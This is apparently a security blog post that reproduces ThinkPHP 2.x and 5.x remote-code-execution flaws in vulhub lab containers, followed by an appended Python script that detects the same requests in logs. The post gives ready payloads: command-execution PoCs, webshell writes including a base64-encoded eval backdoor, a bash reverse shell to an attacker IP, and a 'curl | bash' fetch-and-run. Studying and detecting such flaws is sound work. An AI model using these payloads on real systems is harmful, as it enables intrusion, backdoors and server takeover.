ThinkPHP History Vulnerabilities

Introduction to ThinkPHP

ThinkPHP is an open source, lightweight PHP development framework developed in China; it supports server environments such as Windows, Unix and Linux.
Many CMS products are built on ThinkPHP, so a flaw in ThinkPHP affects every website built on it.

Thinkphp History Vulnerability

Version           Vulnerability type
ThinkPHP 3.2.3    Cache function design flaw that can lead to Getshell
ThinkPHP 3.2.3    update injection vulnerability (latest version)
ThinkPHP 3.2.X    find_select_delete injection
ThinkPHP 3.X      order_by injection vulnerability
ThinkPHP 5.0.X    SQL injection vulnerability
ThinkPHP 5.0.10   Cache function design flaw that can lead to Getshell
ThinkPHP 5        SQL injection vulnerability && sensitive information leakage
ThinkPHP 5.X      order_by injection vulnerability
ThinkPHP 5.X      Remote code execution

ThinkPHP 2.x Arbitrary Code Execution Vulnerability

Vulnerability description

The vulnerability exists because ThinkPHP 2.x parses the route with preg_replace('pattern', 'replacement', 'subject') using the /e (eval) modifier:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

Because of /e, the replacement string is evaluated as PHP, and the user-controlled path segments are inserted into that double-quoted string, which results in arbitrary code execution.

Affected version

ThinkPHP 2.x

ThinkPHP 3.0

Vulnerability reproduction

vulhub

docker-compose up -d

docker ps

Visit the lab target address http://yourip:8080

Verify the vulnerability with a PoC

http://192.168.88.130:8080/index.php?s=/index/index/xxx/${@phpinfo()}

If phpinfo executes successfully, try the webshell

http://192.168.88.130:8080/index.php?s=/index/index/xxx/${${@eval($_POST[111])}}

Connect with AntSword

ThinkPHP 5.0.23 Remote Code Execution Vulnerability (CVE-2018-20062)

Vulnerability description

In ThinkPHP 5.0.23 and earlier, the method that obtains the request method does not correctly validate the method name, allowing an attacker to call arbitrary methods of the Request class, build an exploit chain from them, and achieve remote code execution.

Affected version

ThinkPHP 5.0.0 ~ 5.0.23

Vulnerability reproduction

vulhub

docker-compose up -d

docker ps

Visit the lab target address

To determine whether the vulnerability exists, visit the /index.php?s=captcha page; an error page will appear.

Use a POST request to execute system commands such as whoami, id and pwd; their output is echoed to the page.

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

Use the echo command to write the webshell; the one-line PHP backdoor must be base64 encoded first.

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1BPU1RbJ2NtZCddKTs/PmM= | base64 -d > shell.php

Send the POST request, then access the shell.php file.

Log in to the server to check whether the file was written successfully.

Bash reverse shell

On the attacking machine, create a new file xx.sh containing the bash reverse shell command.

bash -i >& /dev/tcp/192.168.88.128/6666 0>&1

# The IP is the attacking machine's IP; the port can be chosen freely

Start an HTTP service on the attacking machine so that the target machine can fetch the xx.sh reverse shell file.

python3 -m http.server 80

On the attacking machine, listen on port 6666

nc -lvvp 6666

Using a POST request, send the following PoC

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl 192.168.88.128/thinkphp5.0.23.sh | bash

Check the listener: the reverse shell has connected back successfully.

RCE vulnerability analysis caused by ThinkPHP 5.0.x not enabling mandatory routing (CNVD-2018-24942)

Vulnerability description

The framework does not strictly filter the incoming route parameters, so an attacker can address controller classes that were never meant to be routable and execute code remotely.

Affected version

ThinkPHP 5.0.5 ~ 5.0.22
ThinkPHP 5.1.0 ~ 5.1.30

Vulnerability reproduction

vulhub

docker-compose up -d

docker ps

Visit the lab target address to confirm the environment was built successfully.

Write the PoC

index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=-1

Remote command execution PoC

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

Write a webshell

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[ccc]);?>

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n <base64 encoding of the bash reverse shell command> | base64 -d > shell9.php
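A defender-side check for the request patterns described in the three sections above (the 2.x route evaluation, the 5.0.23 _method=__construct chain and the 5.x \think\app/invokefunction route). This is an added example, not code from the original post; the rule names are my own labels and the sample requests and log lines are constructed.

```python
"""Flag the ThinkPHP request patterns this page describes, for WAF rules
or access-log review. Added example, not part of the original post.

Rules (names are my own labels):
  tp2_route_eval        ThinkPHP 2.x/3.0: a "${...}" expression in the s= route
  tp5_controller_route  CNVD-2018-24942: a \\think\\ class or invokefunction in s=
  tp5_method_construct  CVE-2018-20062: POST body with _method=__construct + filter[]
Sample requests and log lines below are constructed, not captured traffic.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined-log request line, e.g. "GET /index.php?s=... HTTP/1.1"
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')
THINK_CLASS = re.compile(r"\\think\\", re.I)  # namespaced class used as a controller

def route_param(url):
    """Return the percent-decoded s= route (ThinkPHP path-info style), or ''."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("s", [""])[0]

def inspect_request(method, url, body=""):
    """Return the rule names matched by one request; an empty list means clean."""
    hits = []
    route = route_param(url)
    if "${" in route:  # expression fed to the /e preg_replace route parser (2.x)
        hits.append("tp2_route_eval")
    if THINK_CLASS.search(route) or "invokefunction" in route.lower():
        hits.append("tp5_controller_route")
    if method.upper() == "POST":  # the 5.0.23 chain travels in the POST body
        params = parse_qs(body, keep_blank_values=True)
        if params.get("_method", [""])[0] == "__construct" and any(
            k.startswith("filter") for k in params
        ):
            hits.append("tp5_method_construct")
    return hits

def scan_access_log(lines):
    """Yield (line_number, hits) for log lines whose request matches a rule.
    Access logs carry no POST body, so tp5_method_construct only fires when
    inspect_request() is given the body (from a WAF or application hook)."""
    for number, line in enumerate(lines, 1):
        match = LOG_LINE.search(line)
        if match:
            hits = inspect_request(match["method"], match["url"])
            if hits:
                yield number, hits

# Constructed sample log: the page's two phpinfo PoCs, percent-encoded as a
# client would send them, followed by an ordinary request that must not fire.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2023:10:00:00 +0000] "GET /index.php?s=/index/index/xxx/%24%7B%40phpinfo()%7D HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2023:10:00:01 +0000] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=phpinfo&vars[0]=-1 HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2023:10:00:02 +0000] "GET /index.php?s=/index/user/profile&id=7 HTTP/1.1" 200 2048',
]
```

Percent-encoding is normalised by parse_qs, so the encoded log lines match the same rules as the plain PoC strings on this page.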


Source: blog.csdn.net/weixin_44971640/article/details/128495915